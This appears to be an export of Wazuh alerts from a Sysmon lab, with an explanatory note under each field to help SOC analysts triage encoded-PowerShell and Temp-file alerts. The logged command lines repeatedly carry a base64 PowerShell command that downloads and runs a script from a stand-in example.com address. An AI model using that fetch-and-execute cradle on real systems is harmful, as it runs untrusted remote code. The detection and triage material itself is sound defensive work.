data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:33.9223709Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350867
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:33.902 ProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} ProcessId: 10052 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mhldo5qe.xqb.ps1 CreationUtcTime: 2025-04-24 22:56:33.902 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:33.902
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a0-680a-ff0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mhldo5qe.xqb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:33.902
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:40.115+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:40.115+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  132
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535400.2880028
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:38.1224674Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350907
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:35.370 ProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00} ProcessId: 3616 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} ParentProcessId: 10052 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:35.370
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a3-680a-010d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1a0-680a-ff0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:40.932+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:40.932+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  136
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535400.2888095
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:38.6009870Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350913
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:38.564 ProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00} ProcessId: 3616 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_alhca2xx.ivy.ps1 CreationUtcTime: 2025-04-24 22:56:38.561 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:38.564
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a3-680a-010d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3616
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_alhca2xx.ivy.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:38.561
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:43.484+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:43.484+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  133
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535403.2890860
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:41.3926518Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350943
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:39.935 ProcessGuid: {94294ddc-c1a7-680a-040d-000000000e00} ProcessId: 12292 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1a3-680a-010d-000000000e00} ParentProcessId: 3616 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:39.935
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a7-680a-040d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12292
Windows PID. Reused once the process exits, so pivot on ProcessGuid rather than on this.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started. Confirm it is the real System32 location; look-alike paths are a masquerading sign.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the PE resource. Compare with the OS build; a mismatch suggests a copied or old binary.

data.win.eventdata.description:  Windows PowerShell
Description field from the PE version resource. Attacker-controlled for unsigned binaries, so confirm with the hash.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product field from the PE version resource; same caveat as Description.

data.win.eventdata.company:  Microsoft Corporation
Company field from the PE version resource; same caveat as Description.

data.win.eventdata.originalFileName:  PowerShell.EXE
Name compiled into the PE. Stays PowerShell.EXE even if the file on disk was renamed, which is the quick masquerading check.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line. -EncodedCommand takes base64 of UTF-16LE script text; decode it before judging the alert, the encoding itself proves nothing.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the process. Shows where the user or script was operating; the profile root here is consistent with an interactive session.

data.win.eventdata.user:  Attacker\\Attcker1
Domain\user the process runs as. Tie it to the LogonId below to find the logon event.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's ID for the logon session; every process in the same session shares it.

data.win.eventdata.logonId:  0x26584
Windows logon ID of the session. Match it to a Security event 4624 to see how, when and from where this user logged on.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is services, 1 and up are interactive or RDP sessions.

data.win.eventdata.integrityLevel:  Medium
Process integrity level (Low/Medium/High/System). Medium is a normal unelevated user; High means the process ran elevated.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file as configured in Sysmon. A known-good powershell.exe hash only says the binary is genuine, not that the command is.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1a3-680a-010d-000000000e00}
Sysmon GUID of the parent process; use it to walk the tree upward to the original launcher.

data.win.eventdata.parentProcessId:  3616
PID of the parent at creation time. Reusable like any PID; prefer ParentProcessGuid.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent. powershell.exe spawning powershell.exe with an encoded command is the pattern behind this alert.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Command line of the parent. Identical to the child's here, so the encoded command is re-launching itself rather than being typed once.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent process runs as. A change from ParentUser to User would mean a token switch.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:44.337+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:44.337+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  137
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535404.2898927
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event; Microsoft-Windows-Sysmon here, so the eventdata fields follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that ETW provider; constant for Sysmon, useful only for filtering.

data.win.system.eventID:  11
Event ID within this provider. For Sysmon, 1 = Process Create and 11 = File Create; these are not the Security log's 4624/4688 numbering.

data.win.system.version:  2
Schema version of this Sysmon event ID. It changes when a Sysmon release adds fields, so parsers should key on it.

data.win.system.level:  4
Numeric event level (4 = Informational). Sysmon logs everything at this level, so it says nothing about severity.

data.win.system.task:  11
Task category of the record. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

